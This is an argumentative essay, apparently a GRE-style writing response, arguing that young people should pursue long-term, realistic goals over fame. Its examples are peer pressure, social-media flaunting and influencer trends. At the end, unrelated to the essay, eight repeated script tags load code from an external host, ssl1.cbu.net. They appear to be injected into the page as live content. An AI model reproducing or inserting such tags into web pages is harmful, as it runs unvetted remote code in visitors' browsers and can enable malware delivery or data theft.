Young people should be encouraged to pursue long-term, realistic goals rather than seek immediate fame and recognition.

Write a response in which you discuss the extent to which you agree or disagree with the statement and explain your reasoning for the position you take. In developing and supporting your position, you should consider ways in which the statement might or might not hold true and explain how these considerations shape your position.

Our goals are often what define us and our happiness, and motivate us to achieve greater things in life. The youth are the pillars of the society and they should be encouraged to pursue practical aspirations, logical goals rather than mindlessly chasing ostentatious goals. I strongly agree with this statement for two reasons.

Young people can often get carried away in chasing fame. They get bedazzled by the thoughts of how their life might change if they get famous and this often becomes their driving force. Though this might lead to short-term satisfaction, fame is rather illusive. For example a young highschooler might start hanging out with the popular kids to become "cool". This might lead to them smoking, taking drugs, consuming alcohol and so on just to fit in. However, all this is sure to take a toll on their physical and mental well-being and might result in digressing their vulnerable minds from focussing on building a career from themselves. Thus, in an attempt to be popular social butterflies, bright young students might see their grades fall and lose their chances of getting into college, ultimately compromising on their careers.

Further, becoming obsessed with the idea of fame and recognition can often lead one to shy away from putting in real efforts toward something practical. People tend to adopt short-cuts to achieve their goals rather than investing in a long-term hobby or skill which would help in building careers to sustain them financially. For instance, today's youth spend a lot of time and energy to upload their work on social media to flaunt, rather than introspecting and getting feedback from critics or experts who can provide meaningful insights to better their work. Thus, while social media can get likes and lot of followers, it would not help one upskill oneself and master one's work.

Moreover, it should be noted that cultivating a realistic goal can ensure one's long-term mental peace. One can truly be happy when one is pursuing something that interests and intrigues them, instead of following the trend and forcefully taking up something which is in fashion. For example, young girls and boys often aspire to become models or influencers simply because the youth belive it to be "vogue". If they could utilise this time to learn a new practical skill, they could actually build a career out of it. Once this trend becomes obsolete, these vivacious young minds will lose out on promising career opportunities because they spent vital days of their youth to blindly follow the throng.

Some might argue that fame brings money and satisfaction, however it is only hard work and honest efforts that can truly make a person sucessful. Success is not solely depend on how rich or famous a person it is. Success is a state of mind that can be achieved when one wholeheartedly and diligently pursues a goal that would interest them in the long-term, instead of giving in to temptations of becoming popular.

<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>